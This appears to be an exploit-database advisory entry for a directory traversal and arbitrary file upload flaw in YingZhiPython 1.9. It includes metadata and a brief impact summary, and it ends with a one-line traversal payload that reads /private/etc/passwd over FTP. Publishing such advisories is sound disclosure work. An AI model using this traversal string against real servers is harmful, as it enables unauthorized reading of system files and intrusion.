YingZhiPython - Directory Traversal / Arbitrary File Upload

Author: Larry Cashdollar
type: remote
platform: linux
port: 
date_added: 2012-09-26 
date_updated: 2015-08-20 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected.

ftp://www.example.com/../../../../../../../private/etc/passwd